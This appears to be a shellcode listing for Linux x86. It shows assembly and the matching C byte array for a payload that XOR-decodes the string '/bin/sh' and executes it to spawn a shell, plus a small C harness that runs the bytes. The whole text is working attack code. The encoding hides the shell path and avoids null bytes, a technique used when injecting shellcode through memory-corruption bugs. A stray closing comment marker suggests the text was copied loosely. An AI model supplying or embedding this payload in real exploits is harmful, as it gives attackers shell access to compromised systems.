linux/x86/ bin/sh Encrypted St1ks

1. .file "xor-encrypted shellcode"
2. .version "1.0"
3. .text
4.     .align 4
5. .globl main
6.     .type main,@function
7. _start:
8.     xorl    %eax,%eax
9.     jmp     0x22
10.     popl    %ebx  
11.     movl    8(%ebx),%edx
12.     xor %edx,(%ebx)
13.     xor %edx,4(%ebx)
14.     xor %edx,%edx
15.     movl    %ebx,0x8(%esp)
16.     movl    %edx,0xc(%esp)
17.     movb    $0xb,%al
18.     leal    0x8(%esp),%ecx
19.     int     $0x80
20.     xorl    %ebx,%ebx
21.     movl    %ebx,%eax
22.     incl    %eax
23.     int     $0x80
24.     call    -0x27
25.     .string "\x6e\x23\x28\x2f\x6e\x32\x29\x41\x41\x41\x41\x41"
26. */
27.  
28. #define NAME "encrypted"
29.  
30. char code[]=
31. "\x31\xc0\xeb\x22\x5b\x8b\x53\x08\x31\x13\x31\x53\x04\x31\xd2\x89"
32. "\x5c\x24\x08\x89\x54\x24\x0c\xb0\x0b\x8d\x4c\x24\x08\xcd\x80\x31"
33. "\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff"
34. "\x6e\x23\x28\x2f\x6e\x32\x29\x41" /* encrypted "/bin/sh" */
35. "\x41\x41\x41\x41";     /* Conversion chars */
36.  
37. main()
38. {
39.   int (*funct)();
40.   funct = (int (*)()) code;
41.   printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code));
42.   (int)(*funct)();
43. }